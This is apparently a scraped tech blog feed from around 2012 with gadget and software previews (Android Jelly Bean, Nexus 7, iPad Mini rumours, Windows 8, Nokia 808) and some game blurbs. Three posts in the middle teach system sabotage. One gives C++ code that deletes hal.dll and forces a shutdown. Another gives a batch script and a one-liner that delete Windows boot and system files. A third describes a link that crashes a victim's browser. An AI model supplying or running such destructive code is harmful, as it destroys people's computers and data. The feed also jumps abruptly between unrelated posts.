Android 4.1 Jelly Bean...What's New ...Review and Trailers

What’s New in Android 4.1 Jelly Bean and Google Nexus 7 Tablet First Look

Google has announced that the next version of it’s hugely popular mobile operating system Android will be called “Jelly Bean”. This is in keeping with the tradition of naming each OS version, Jelly Bean being 4.1, after a dessert in alphabetical order. So the next Android version will probably be named after a dessert starting with K, get the drift? Jelly Bean is the evolution of the Android OS which is now common for both phones and tablets. Google has announced that the first Jelly Bean devices will ship in July. Some of the devices are the Galaxy Nexus phone, the Motorola Xoom tablet and Google’s very own Nexus 7 tablet. So let’s have a look at all the shiny new stuff, shall we?

Android 4.1 Jelly Bean

The new Android packs in a host of new features, the most noticeable of which is what Google calls “Project Butter UI”. This rather quirky name refers to Google’s attempt to make the UI on all Android devices “fast, fluid and smooth” by triple buffering graphics. In practice, the Android UI now runs at a brisk 60 fps, and it seems far more fluid than Ice Cream Sandwich, even on the exact same hardware. Check out a comparison here:

Another big new feature is Google Now. It’s basically a predictive app that gathers data from the internet and observes your daily routine to provide relevant information. For example, you can simply say “sports” and Google Now would show you all your favorite team scores, upcoming matches and the like. Or in daily life, you can say “traffic” and it would check for traffic along your daily route and alert about any delays beforehand. Let’s just say Google Now makes Android devices more….sentient, *shudder*. Anyway, it’s a super cool feature that we can’t wait to see. Also included are new voice control features that improve and add more functionality to the existing set of features. Now voice input is possible without connecting to the internet too. The home screen is also changed, expect a better app launcher and more interactive notifications, a la Windows Phone.

Google Nexus 7 Tablet

The first new device to be running Android 4.1 Jelly Bean will be the Google Nexus 7 tablet. Manufactured by Asus, the Nexus 7 will come with a 1.2 GHz Nvidia Tegra 3 (T30L) quad-core ARM Cortex-A9, 1 GB RAM and will be available in 8 GB and 16 GB storage space variants. The Nexus “7″ is named such because unlike most tablets, it has a 7 inch screen running at 1280 x 800 resolution, so it’s a direct competitor to the Amazon Kindle Fire and the BlackBerry PlayBook. There is no expandable memory and it lacks an HDMI slot as well. But then again, the launch price is really very competitive. The 8 GB version is 199$ and the 16 GB version is 250$. Unlike the PlayBook though, the Nexus 7 features a front facing 1.2 MP camera for video conferencing.

All media content and apps will be delivered through Google Play and it will also feature Google Chrome as the default browser. The Google Nexus 7 looks like a fantastic device and we’d like to see it come to India priced reasonably. It’s no iPad competitor, but those features and specs are nothing to scoff at either!

Let us know what you think about the announcements of Android 4.1 Jelly Bean and the Google Nexus 7 tablet.

Darksiders II Trailer Review System Requirements

Darksiders 2
A sequel to the surprise hit Darksiders released in 2010, Darksiders 2 follows another one of the Four Horsemen of the Apocalypse. In Darksiders, players got to play as “War”. Darksiders 2 puts players in the shoes of “Death” in a parallel storyline a la Crysis Warhead. Apple I-Pad MIni..To be Launched in 2012

  I-Pad MINI-for apple geeks ;)

The Apple iPad has quickly become one of the most popular devices on the planet and it’s actually set benchmarks for what tablets should be like. Combining a large, gorgeous high resolution display, powerful hardware and Apple’s slick iOS, the iPad was very well received. However, like most Apple products, it was on the steeper side on the pricing front. Despite this, the iPad has pretty much dominated the tablet market and every other tablet has been left in the dust.

Since a few months, there have been rumors of a new, smaller iPad launch by the end of 2012. Just recently a few manufacturers and anonymous sources have confirmed that Apple is indeed coming out with a smaller version of the iPad by fall 2012, probably with the iPhone 5. So what do we know as of now? Not much, unfortunately.

There have been tidbits floating around, have a look:

7-8 inch screen – The iPad Mini will go head to head with Amazon Kindle Fire, BlackBerry PlayBook and the recently announced Google Nexus 7 tablet. All of these tablets feature 7 inch screens.
Variants – Like the Google Nexus 7 tablet, the iPad Mini will probably come in 8 GB and 16 GB variants.
Screen Resolution - Apparently, the iPad Mini will not feature Retina Display as a cost cutting measure and will instead probably come with the original iPad’s 1024 x 768 resolution. However, some reports suggest that it will indeed feature Retina Display.
Hardware – Nothing has been revealed about the processing power, but we reckon it could be an underclocked version of the iPad 3rd Gen’s processor or maybe an underclocked version of the iPhone 5‘s processor, although that seems unlikely. Some reports say that the iPad Mini could also use the older Apple A5 processors.
Naming - While iPad Mini is the name being thrown around most often, it could also very well be called the iPad Nano. Let’s wait and watch.
Pricing - The biggest factor of them all is pricing. Even though the iPad is priced rather highly, it’s still flying off the shelves and people would rather wait, save up and go for an iPad instead of settling for a lower priced Android tablet. That speaks volumes about the way Apple has captured the market. Now, if the iPad Mini launches at a lower price point and manages to deliver the goods like its bigger brother, it will practically destroy the competition. On that note, rumored prices of the iPad Mini are around 249-299$.
The iPad Mini could very well turn out to be like the iPod, there are numerous alternatives but it remains the highest selling music player ever. Maybe a few years down the line the iPad could be the sort of product that holds 80% of the market share while everything else has to fight to remain in the 20%. Looks like the Google Nexus 7 has a solid competitor on the way, and it hasn’t even released yet!

Everything you need to know about USB 3.0

Everyone probably knows what USB stands for, universal serial bus. It’s one of those abbreviations that’s so commonplace, its become part of our daily life. Like the name implies, USB is truly universal. It is one of the most versatile communication protocols in the world today. Encompassing devices of all shapes and sizes, USB connectors are found on computers, televisions, photo frames and whatnot! Originally started as an attempt to facilitate easier connections between devices and computers, it has now become the standard connection interface. Now, when you go out to get yourself a new device, lets say an external hard drive, you’ve probably come across a few that boast of “USB 3.0 support”. Also, these devices are slightly more expensive. So what’s it all about?

The tech world has a penchant for adding larger numbers to software and hardware alike, and often, it’s hardly a change. But that’s not the case this time around, USB 3.0 is quite an improvement over its predecessor. Although introduced back in 2008, USB 3.0 devices and capable computers have started breaching the mainstream market only in the recent past. It’s hardly been long since USB 3.0 devices don’t burn large holes in your pocket.

Google Goggles Review and Preview..and Download for Android and I-Phone

Google Goggles brings visual search to your mobile phone. Point and click, and it delivers information about what you're seeing

Mobile searching has just become way, way cooler. Google unveiled its new Google Goggles visual search tool for Android this week, bringing a high-tech twist to accessing information on the go.
Google Goggles - not to be confused with Google Mail Goggles, the company's inebriated emailing preventer - lets you search from your mobile phone simply by snapping a photo.

Want more info on a product? Take its picture.

Need info about a business? Photograph the storefront.

Put simply, this thing packs some serious power, and its capabilities stretch far.

Google Goggles currently supports photo-based searching for (take a deep breath): books, DVDs, landmarks, logos, contact info, artwork, businesses, products, barcodes, and plain text.

Here's how it works. When you capture an image, Google breaks it down into object-based signatures. It then compares those signatures against every item it can find in its image database. Within seconds, it returns the results to you, ordered by rank. Some results are returned before you even snap a photo, too, thanks to seamless integration of GPS and compass functionality.

But enough on the nuts and bolts. Let's put search-by-sight to the test.

Hands-On With Google Goggles

We started out with something easy: a book. After opening the app, we followed the instructions and took a photo. Google Goggles started analyzing the image. Sure enough, seconds later, we had the results.
Just from seeing the book's cover, Google Goggles gave us the full name and links to compare prices or even preview the text. Below that, it returned regular search results for the title. Not too shabby.

Play Station 4 Concept....Awesome Design PS4

Although still a number of years away, a concept designer has decided to create a 3D model of a PlayStation 4. It was created by designer Tai Chiel and has a number of interesting features such as an embedded OLED screen in the transparent section to allow you to view menus, saved games and what looks to be like a game playing on one of the screen shots.

It is unclear when a PS4 will be made available as there are many years left in the PS3 and other consoles like the XBox 360, but that still doesn't stop the design from being great.
What are your thoughts on a PS4. Will one be coming in the next few years?

Sony Network Media Player

In a year when every TV maker seems to be building full Internet connectivity into their displays, Sony's Network Media Player powered by Google is a lifeline tossed back to all the poor, unconnected TVs already out there. It streams online video from services like Netflix and HBO Go, and can be controlled with an iOS or Android smartphone, but we're actually more excited about the hardware. The exclusive remote control has a full, backlit QWERTY keyboard on one side, and more traditional buttons on the other, with a less traditional trackpad. Other companies should sit up and take notice‹if you want to revolutionize the TV, start with a revolutionary remote. The player, and remote, will be out this summer, though prices haven't been announced.

What New and Advanced Features Can We Expect in Windows 8: A Preview

Windows 8, as evident from the name, is the upcoming successor to the Windows 7 operating system. Although a release date hasn’t been announced as of now, a developer preview has been out and a consumer preview is slated for February 29, 2012. Then comes the quintessential question, what’s new? Well, most of it is all new, it’s quite a leap forward from everything Microsoft has ever done. The changes are vast in number, but we will try to cover most which affect the average user.

Windows 8 : Metro UI

When you see it initially, the first thing you’d probably notice the changed UI. The snazzy new minimalistic interface is called “Metro”. This new design language is being applied across Microsoft’s range of products and is currently visible on Windows Phone 7/7.5, Zune and the Xbox 360 dashboard. It’s based on typography and is neat, sophisticated and modern.www.game2tech.blogspot.com If you have a basic idea of how Windows Phone 7/7.5 looks, you pretty much know how Windows 8 will look.

 Technical Changes

On the technical front, Windows 8 will be the first to support the ARM processor architecture along with previously supported Intel and AMD x86 architectures. ARM processors are mainly used in low power applications such as netbook, tablet PC, mobile phone processors, so you can expect to see Windows 8 variants on netbooks and tablets in the future. Also, Windows 8 will introduce a new file system called ReFS (Resilient File System) that will support almost all previous file system features, but will be more efficient and secure. It will allow for extremely large files with different partitions as well. ReFS aims to counter data corruption and recover as much data as possible in the event of a sector corruption. Furthermore, it can fix disk errors and inconsistencies on the fly. Windows Live ID functionality will be integrated along with access to a Windows Store with apps, similar to mobile phones. Furthermore, Windows 8 will support USB 3.0.

Interface and Logon

Windows 8 introduces a whole new approach to user interfaces. Gone are the days of a traditional start menu, instead there’s a start screen with tiles containing regular programs, apps, folders, picture of the person logged on and so on. The regular desktop can also be displayed, although it is treated as an app with it’s own tile in the start screen. The login screen is now customizable with date, time and day also mentioned, similar to the lock screen on Windows Phone 7. Login protection now includes gesture recognition so you can unlock your computer using just gestures on the screen or on a picture instead of the regular text based password. But, 5 unsuccessful attempts at gesture unlocking will require a text password to unlock the computer

.

Apps and Programs

The apps and programs displayed in tiles on the screen are fully customizable and can be rearranged, they also show notifications. For example, the e-mail app will show how many messages are unread and such. Another interesting feature is that apps and programs can now be pinned to the screen, so you can play a game and chat at the same time on different apps! A new task manager now does duty in Windows 8. It is completely different from the present one, although the older version can be switched to at will. Instead of showing tabs, the task manager now shows running applications, color coded application loads and also includes startup programs. It is now more streamlined and all the running applications display memory, CPU, network and disk usage.

ZTE Mimosa X Preview – The First All Nvidia Powered Smartphone

ZTE Mimosa X Preview – The First All Nvidia Powered Smartphone

ZTE probably doesn’t strike your mind when you’re thinking of smartphones, but it’s now in the news for what seem to be all the right reasons. The new ZTE Mimosa X was announced on 20th February and will be officially revealed in the upcoming Mobile World Congress in Barcelona. So what’s the buzz around this phone? Not much has been revealed, but from initial impressions the Mimosa promises quite a lot and seems to be “the” mainstream phone to have. Sure, ZTE’s  name isn’t among the top dogs like Samsung, Nokia or Sony Ericsson but it’s not entirely unknown either! ZTE is the second largest telecoms equipment companies in it’s home country, China. Basically, ZTE produces mobile handsets that are branded differently in different countries. For example, the ZTE Blade is known in India as Dell XCD35 or Idea Blade.
The ZTE Mimosa X is the first all Nvidia powered smartphone. That is, all of the major processes are Nvidia powered. The Mimosa X runs on a Nvidia Tegra 2 system, which basically houses the CPU, GPU and memory controllers on a single chip. The Tegra 2 system uses the ARM Cortex A9 processor and the one in the Mimosa is a 1.2Ghz dual core unit. Apart from this, Nvidia’s mobile GeForce GPU does duty here and is a tried and tested component. However, a first here is that the Mimosa X uses an Icera 450 modem. Back in mid 2011, Nvidia acquired Icera, which is a manufacturer of mobile network devices. The Mimosa X is the first phone to bear components that were made after the Nvidia-Icera merger. Also, the Mimosa X comes with Android 4.0 (Ice Cream Sandwich) right out of the box! It’s a first for a phone of this price range. A VIRUS using C program......

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Crash A Computer with a Link...

Crash a Computer System With Nothing But a Link.
I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

Windows 8 - Review of the Preview and Free Download

This Leap year brought us a new beginning in the world of computing on mobile.The Windows 8 Consumer Preview is released officially by Microsoft on the 29th of february . The released version is just a trailer of the full length movie that's about to come . So as a trailer is free for all on youtube so is the Consumer Preview.

 Windows 8 is Microsoft’s attempt to bring the many fantastic and sensible innovations that Apple’s iPhone, Google’s Android, and Microsoft’s Windows Phone smartphones have brought to the world of computing. And it’s also an attempt to rework Windows as a “touch-first” operating system, meaning that it’s interface is simple and designed to be used in touch tablets similar to the iPad.

You can download and install it for free, but we must warn you: It’s a preview so it comes with bugs and incomplete functionality.
Here's Microsoft Warning before you try it on your PC.

"Important: If you decide to go back to your previous operating system, you'll need to reinstall it from the recovery or installation media that came with your PC, which is typically DVD media. If you don’t have recovery media, you might be able to create it from a recovery partition on your PC using software provided by your PC manufacturer. Check the support section of your PC manufacturer’s website for more information. After you install Windows 8, you won’t be able to use the recovery partition on your PC to go back to your previous version of Windows. "

System Requirements

Windows 8 Consumer Preview works great on the same hardware that powers Windows 7:
  • Processor: 1 gigahertz (GHz) or faster
  • RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit)
  • Hard disk space: 16 GB (32-bit) or 20 GB (64-bit)

Shutdown A Computer Forever...

Shutdown A Computer Forever!

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

Nokia Pure View 808...amazin

Nokia Pure View 808 with 41 MP …muuuaaaaahhh

Nokia recently unveiled the Pure View 808, a mobile phone with a 41 megapixel camera! If you’re on Facebook you’ve probably also seen the gazillion posts about this phone and the obligatory oohs and aahs for it. If you’re thinking of ditching your 10-odd megapixel camera for this phone, think again! Digital cameras with about 15 megapixels or so can take very good looking photos, just like the Nokia Pure view 808. Hard to believe? Read on.

Nokia Pure View 808 :

So, on paper the Nokia Pure view 808 has far more megapixels than a DSLR camera which costs an arm and a leg. So why would you get the DSLR camera? The answer, because it takes far better photos than a 41 megapixel camera phone. After a certain point, megapixels cease to matter. The 808 uses a different technology that basically packs a large amount of pixels in regular 5 or 8 megapixel shots. Sure, you can take upto 38 megapixel shots, but they’re only going to be useful if you want to print a billboard large enough to be seen from a few kilometers away, not your average use isn’t it? The Nokia 808 Pure View crunches a lot of pixels into a single “superpixel” to replicate the actual clarity and richness a DSLR of the same megapixel count. For a reference, let it be known that the extremely clear HDTV’s have about 2″effective” megapixels.

Batman Arkham City:News,System Requirements,Trailer...

BATMAN ARKHAM CITY

I don’t even need to tell you why this game is on top. Definitely the best game of 2011 as this is the first game about Batman on PC this large scale to be released apart from Arkham Asylum . This game allows you to utilize the unique  combat system to chain together unlimited combos continuously and battle with huge groups of  The Joker’s army in brutal melee attacks.It also allows you to move through the environment with the use of Batman’s grapnel to reach and move around through places, and jump from any height and glide in any direction. As far as I heard,you can fight against Gotham’s greatest villains like Killer Croc, Harley Quinn, Victor Zsasz and last but not the least, The Joker. And the best part about this game is  that it is truly authentic to the franchise, but also something really fun and mainly sticks to the comic book.One of the most unusual things about the game is that you have a different location from the Batman  that no one has ever seen before.The previous installment, Batman: Arkham Asylum has even made history by bagging a Guinness World Record for ‘Most Critically Acclaimed Superhero Game Ever’! Batman: Arkham City on PC will release on October 18, 2011.Available on PS3, PC, 360 and Wii U.
